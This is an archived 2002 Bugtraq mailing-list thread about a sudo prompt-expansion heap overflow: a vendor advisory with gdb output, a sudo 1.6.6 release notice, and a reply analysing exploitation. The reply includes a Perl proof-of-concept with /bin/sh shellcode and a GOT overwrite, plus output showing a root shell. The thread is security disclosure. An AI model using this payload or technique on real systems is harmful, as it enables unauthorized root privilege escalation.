8344561 2002-04-25 14:17 +0000 /207 rader/ Global InterSec Research <lists@globalintersec.com>
Sänt av: joel@lysator.liu.se
Importerad: 2002-04-25 18:47 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern kopiemottagare: research@globalintersec.com
Mottagare: Bugtraq (import) <22050>
Ärende: [Global InterSec 2002041701] Sudo Password Prompt Vulnerability.
------------------------------------------------------------
From: Global InterSec Research <lists@globalintersec.com>
To: bugtraq@securityfocus.com
Cc: research@globalintersec.com
Message-ID: <4.2.0.58.20020425141650.06763e90@193.133.49.25>
Global InterSec LLC
http://www.globalintersec.com
GIS Advisory ID: 2002041701
Changed: 25/04/2002
Author: research@globalintersec.com
Reference: http://www.globalintersec.com/adv/sudo-2002041701.txt
Summary:
Sudo - A popular utility for allowing users to execute
commands as other users contains a vulnerability which
may be exploited to execute arbitrary commands.
Impact:
A local user may gain root access through corruption of
the heap (Off-By-Five).
Versions Tested To Be Vulnerable:
1.6.5p2
1.6.4
1.6.3p7 (SuSE 7.1 Update, RedHat 7.2)
1.6.3 (SuSE 7.1)
1.6.2
Description:
Sudo, an open source utility shipped with many linux
distributions enables the super user to grant non
root users permission to execute commands as other
users (including root). Access to sudo is normally
regulated via /etc/sudoers.
One of the functions of sudo enables users to specify
the password prompt given when challenged for their
password to 'sudo'. On parsing this parameter (-p) to
sudo, a user may also specify characters which expand
to either the hostname (%h) or the username (%u).
On the reception of these expansion characters, sudo
will malloc() memory for the string the argument to -p
will form.
Unfortunately it is possible to trick sudo into allocating
less memory than it should for the prompt.
Under certain conditions it is possible to exploit this
bug to corrupt the heap in a way in which could be used
to execute arbitrary commands.
Because of the nature of sudo, it is installed by default
as suid() root and therefore could be used to escalate
normal user privileges to that of the root user, taking
into account the restrictions noted below.
Scope for attack:
As noted above, this vulnerability could be used to escalate
user privileges to that of the super user.
However, for this to happen several factors must be considered.
- The options which sudo were compiled with may determine
if it is exploitable or not. In our tests we used binaries
compiled with PAM support, which we found to be exploitable.
Many distributions of linux ship with PAM enabled builds of
sudo.
Distributions shipping PAM enabled sudo binaries include
those of SuSE and RedHat.
- The length of the hostname on the system a vulnerable
binary is on is a critical factor in the way in which
the bug is exploited.
Work around:
Remove the suid bit from the sudo binary and remove any
entries in /etc/sudoers.
Credit:
This vulnerability was originally discovered by fc,
a GIS affiliate. Research and vendor coordination
were carried out by the Global InterSec research
division, under Tom Parker.
Please email research@globalintersec.com for more
information.
Thanks also to Todd Miller, the sudo maintainer for
responding so quickly to our email.
Vendor Solutions:
A patch for version 1.6.5p2 is available at:
http://www.globalintersec.com/adv/files/sudo-1.6.5p3.patch
Both the Sudo maintainer and Vendors shipping vulnerable
versions of sudo have been notified well in advance of the
release date. A list of advisories by individual vendors will
be appended to this advisory as they become available.
The most recent copy of this advisory is available at the
"Reference" URL noted in the header of this advisory.
Proof of Concept, Semi-Technical Details:
When sudo is called with the -p parameter, expand_prompt()
is called to check for and expand any special characters
parsed as arguments to -p (%h or %u).
expand_prompt will then calculate space for the expanded
prompt and malloc() the calculated amount.
On miscalculation of the required space, the place in
which sudo break will depend on:
- The string used to cause sudo to miscalculate
the required space and the length which any
expansion character(s) expand to.
- The compilation options sudo was built with.
These factors therefore have a direct influence on how the
bug is to be exploited, if at all.
In the case of a string 'h%h%' being parsed to the -p
option, miscalculation of the prompt length occurs due
to the first h in our string being treated as an %h
and the last character still having the value of % where
it should of been given the value '\0' if *lastchar had
been re-initialised correctly.
In the example below we used a system who's hostname was 7
bytes long. Because of the length of the hostname, we were
able to trigger the vulnerability, but without causing a
SEGV, before we were able to write additional data into
memory for sudo to read into.
In the case of a system with a hostname over 8 bytes, you
may find that the expansion of the hostname has written
so far into memory that sudo segfaults before additional
memory can be written via the password prompt.
In this case an alternative method would be needed to write
into memory so that relevant registers are corrupted.
This could possibly be in parameters to -p or in the environment
variable 'SUDO_PROMPT' (which -p overrides).
user@defiant:~/research/sudo/dist/sudo-1.6.5p2 > gdb sudo
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
(gdb) r -p h%h% -s
Starting program: /research/sudo/dist/sudo-1.6.5p2/sudo -p h%h% -s
efiantdefian¡ <4 Bytes>\xef\xbe\xad\xde\<84 Bytes> # Password
Challenge Sorry, try again.
Program received signal SIGSEGV, Segmentation fault.
0x400d49c1 in chunk_alloc () from /lib/libc.so.6
(gdb) i r $edi
edi 0xdeadbeef -559038737
(gdb)
Note that %ecx and %edx were also within our reach.
Our example used a sudo 1.6.5p2 binary with --with-pam enabled
at build time.
The off-by-five condition still occurs when sudo is compiled
without PAM as we can see from the following example, using
a slightly modified version of sudo.
user@defiant:~/research/sudo/dist/sudo-1.6.5p2 > ./sudo -p h%h% -s
Allocating 9 bytes for prompt: efiantdefiant% (14 bytes long)
efiantdefiant%
Sorry, try again.
efiantdefiant%
^C
./sudo: 1 incorrect password attempt
user@defiant:~/research/sudo/dist/sudo-1.6.5p2 >
To this end - sudo without pam support (or any other
configuration) must be considered vulnerable as alternative ways
to cause functions in sudo to read into corrupted areas of memory
and gain flow control of sudo (other than the pam functions) may
exist.
Please see: http://www.phrack.org/show.php?p=57&a=8 for more
information on exploiting this type of vulnerability,.
Legal:
This advisory is the intellectual property of Global InterSec LLC
but may be freely distributed with the conditions that:
a) No fee is charged
b) Appropriate credit is given.
(c) Global InterSec LLC 2002
(8344561) /Global InterSec Research <lists@globalintersec.com>/(Ombruten)
Kommentar i text 8344573 av Exportören
8344636 2002-04-25 19:08 +0200 /93 rader/ Jonas Eriksson <je@sekure.net>
Sänt av: joel@lysator.liu.se
Importerad: 2002-04-25 19:14 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <22051>
Ärende: Sudo version 1.6.6 now available (fwd)
------------------------------------------------------------
From: Jonas Eriksson <je@sekure.net>
To: bugtraq@securityfocus.com
Message-ID: <Pine.BSO.4.44.0204251907570.5119-100000@birdie.sekure.net>
---------- Forwarded message ----------
Date: Thu, 25 Apr 2002 10:34:13 -0600
From: Todd C. Miller <Todd.Miller@courtesan.com>
To: sudo-announce@courtesan.com
Subject: Sudo version 1.6.6 now available
Sudo version 1.6.6 is now available (ftp sites listed at the end).
Changes since Sudo 1.6.5p2:
o Fixed compilation problem on HP-UX 9.x.
o Moved call to endpwent() and added a call to endgrent().
o Fixed a warning conflicting declaration of VOID with AFS.
o Fixed a security hole in prompt rewriting found by Global InterSec.
Please note that Sudo 1.6.6 fixes a security hole present in sudo
versions 1.5.7 - 1.6.5p2. Please see:
http://www.sudo.ws/pipermail/sudo-announce/2002-April/000020.html
http://www.globalintersec.com/adv/sudo-2002041701.txt
for details.
sudo 1.6.6 distribution:
ftp://ftp.sudo.ws/pub/sudo/sudo-1.6.6.tar.gz
Master WWW site:
http://www.sudo.ws/sudo/dist/
Mirrors (not yet updated)
WWW Mirrors:
http://sudo.stikman.com/ (Los Angeles, California, USA)
http://mirage.informationwave.net/sudo/ (Fanwood, New Jersey, USA)
http://sudo.planetmirror.com/ (Australia)
http://sudo.cdu.elektra.ru/ (Russia)
Master FTP sites:
ftp.sudo.ws:/pub/sudo/
ftp.cs.colorado.edu:/pub/sudo/
FTP Mirrors:
ftp.cs.colorado.edu:/pub/sudo/ (Boulder, Colorado, USA)
ftp.stikman.com:/pub/sudo/ (Los Angeles, California, USA)
ftp.uu.net:/pub/security/sudo/ (Falls Church, Virginia, USA)
ftp.tux.org:/pub/security/sudo/ (Beltsville, Maryland, USA)
ftp.cerias.purdue.edu:/pub/tools/unix/sysutils/sudo/ (West Lafayette, Indiana, USA)
ftp.uwsg.indiana.edu:/pub/sudo/ (Bloomington, Indiana, USA)
sudobash.com:/pub/sudo/ (Ypsilanti, Michigan, USA)
ftp.tamu.edu:/pub/mirrors/ftp.courtesan.com/ (College Station, Texas, USA)
ftp.rge.com:/pub/admin/sudo/ (Rochester, New York, USA)
mirage.informationwave.net:/sudo/ (Fanwood, New Jersey, USA)
ftp.wiretapped.net:/pub/security/host-security/sudo/ (Australia)
ftp.tuwien.ac.at:/utils/admin-tools/sudo/ (Austria)
sunsite.ualberta.ca:/pub/Mirror/sudo/ (Alberta, Canada)
ftp.csc.cuhk.edu.hk:/pub/packages/unix-tools/sudo/ (Hong Kong, China)
ftp.eunet.cz:/pub/security/sudo/ (Czechoslovakia)
ftp.umds.ac.uk:/pub/sudo/ (Great Britain)
ftp.tvi.tut.fi:/pub/security/unix/sudo/ (Finland)
ftp.lps.ens.fr:/pub/software/sudo/ (France)
ftp.crihan.fr:/pub/security/sudo/ (France)
ftp.rz.uni-osnabrueck.de:/pub/unix/security/sudo/ (Germany)
ftp.win.ne.jp:/pub/misc/sudo/ (Japan)
ftp.st.ryukoku.ac.jp:/pub/security/tool/sudo/ (Japan)
ftp.eos.hokudai.ac.jp:/pub/misc/sudo/ (Japan)
ftp.tokyonet.ad.jp:/pub/security/sudo/ (Japan)
ftp.kobe-u.ac.jp:/pub/util/security/tool/sudo/ (Japan)
ftp.cin.nihon-u.ac.jp:/pub/util/sudo/ (Japan)
ftp.fujitsu.co.jp:/pub/misc/sudo/ (Japan)
core.ring.gr.jp:/pub/misc/sudo/ (Japan)
ftp.ring.gr.jp:/pub/misc/sudo/ (Japan)
ftp.ayamura.org:/pub/sudo/ (Japan)
ftp.iphil.net:/pub/sudo/ (Makati City, Philippines)
ftp.icm.edu.pl:/vol/wojsyl5/sudo/ (Poland)
ftp.assist.ro:/pub/mirrors/ftp.courtesan.com/pub/sudo/ (Romania)
ftp.sai.msu.su:/pub/unix/security/ (Russia)
ftp.cdu.elektra.ru:/pub/unix/security/sudo/ (Russia)
ftp.mc.hik.se:/pub/unix/security/sudo/ (Sweden)
ftp.sekure.net:/pub/sudo/ (Sweden)
ftp.edu.tw:/UNIX/sudo/ (Taiwan)
ftp.comu.edu.tr:/pub/linux/prog/sudo/ (Turkey)
____________________________________________________________
sudo-announce mailing list <sudo-announce@sudo.ws>
For list information, options, or to unsubscribe, visit:
http://www.sudo.ws/mailman/listinfo/sudo-announce
(8344636) /Jonas Eriksson <je@sekure.net>/----------
Kommentar i text 8345685 av Przemyslaw Frasunek <venglin@freebsd.lublin.pl>
8345685 2002-04-25 21:01 +0200 /87 rader/ Przemyslaw Frasunek <venglin@freebsd.lublin.pl>
Sänt av: joel@lysator.liu.se
Importerad: 2002-04-26 00:32 av Brevbäraren
Extern mottagare: vuln-dev@securityfocus.com
Extern kopiemottagare: bugtraq@securityfocus.com
Externa svar till: venglin@freebsd.lublin.pl
Mottagare: Bugtraq (import) <22053>
Kommentar till text 8344636 av Jonas Eriksson <je@sekure.net>
Ärende: Re: Sudo version 1.6.6 now available (fwd)
------------------------------------------------------------
From: Przemyslaw Frasunek <venglin@freebsd.lublin.pl>
To: vuln-dev@securityfocus.com
Cc: bugtraq@securityfocus.com
Message-ID: <m34rhzpppq.fsf@clitoris.czuby.net>
Jonas Eriksson <je@sekure.net> napisal(a):
> o Fixed a security hole in prompt rewriting found by Global InterSec.
Looks like, it won't be easy to exploit.
There are possible few scenarios: using a unlink() or frontlink()
macro in chunk_alloc() or chunk_free(). In both cases we can control
fd and bk pointers passed to macros, using the long pathname
argument. The most important problem is to set fake chunk size to safe
value. It must be positive (to pass condition in chunk_alloc() before
unlink()) and quite small (remainder + remainder_size must be valid
pointer). With smallest possible value without NULL bytes (0x01010101)
it segfaults. It can't be negative also.
0x08054bff in chunk_alloc (ar_ptr=0x805f9a0, nb=80) at malloc.c:2996
2996 set_foot(remainder, remainder_size);
set_foot() macro is called just after offending unlink(). Arbitrary
address is already overwritten, but remainder_size is way to big. This
scenario is possible to exploit when SIGSEGV sighandler would be
set (but it's not).
The attached below code ISN'T A WORKING EXPLOIT. It's only my
demonstration, how it would be exploitable in case of SIGSEGV handler
set or set_foot() macro not segfaulting.
[venglin@clitoris sudo-1.6.5p2]$ cat babunia.pl
$sudo = $ARGV[0];
$prompt = "h%h%h%h%aaaaaaaaaaaaaaaaaaaah%";
$prepad = 266;
$postpad = 512;
$retloc = hex(`objdump -R $sudo | grep '\\<_exit\\>' | cut -f1 -d' '`);
$retad = 0x8063b10;
$align = 20;
print "Prompt: $prompt\n";
print "Prepad: $prepad\n";
print "Postpad: $postpad\n";
print "Align: $align\n";
print "_exit() @ ", sprintf("0x%x\n", $retloc);
print "shellcode @ ", sprintf("0x%x\n", $retad);
$testcode = "\xeb" . chr($align);
$testcode .= "\x90" x $align;
$testcode .= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c";
$testcode .= "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb";
$testcode .= "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
$frame = pack('l', 0x01010101);
$frame .= pack('l', $retloc-12);
$frame .= pack('l', $retad);
$path = "a" x $prepad;
$path .= $frame;
$path .= $testcode;
$path .= "a"x($postpad - length($testcode));
system($sudo, "-p", $prompt, $path);
[venglin@clitoris sudo-1.6.5p2]$ perl ./babunia.pl ./sudo
Prompt: h%h%h%h%aaaaaaaaaaaaaaaaaaaah%
Prepad: 266
Postpad: 512
Align: 20
_exit() @ 0x805fe40
shellcode @ 0x8063b10
litorisclitorisclitorisclitoris%aaaaaaaaaaaaaaaaaaaah%
Sorry, try again.
litorisclitorisclitorisclitoris%aaaaaaaaaaaaaaaaaaaaI
¨¨ry again.
litorisclitorisclitorisclitoris%aaaaaaaaaaaaaaaaaaaaI
¨¨ry again.
./sudo: 3 incorrect password attempts
# id
uid=0(root) gid=1000(users) egid=0(root) groups=1000(users),6(disk),23(audio),24(video)
My recent idea was to expand heap by passing 0x01010101 bytes of
environment variables, so remainder + remainder_size would be
reachable and set_foot() macro wouldn't segfault. But I haven't tried
out it yet.
-- * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL:
PMF9-RIPE * * Inet: przemyslaw@frasunek.com ** PGP:
D48684904685DF43EA93AFA13BE170BF *
(8345685) /Przemyslaw Frasunek <venglin@freebsd.lublin.pl>/(Ombruten)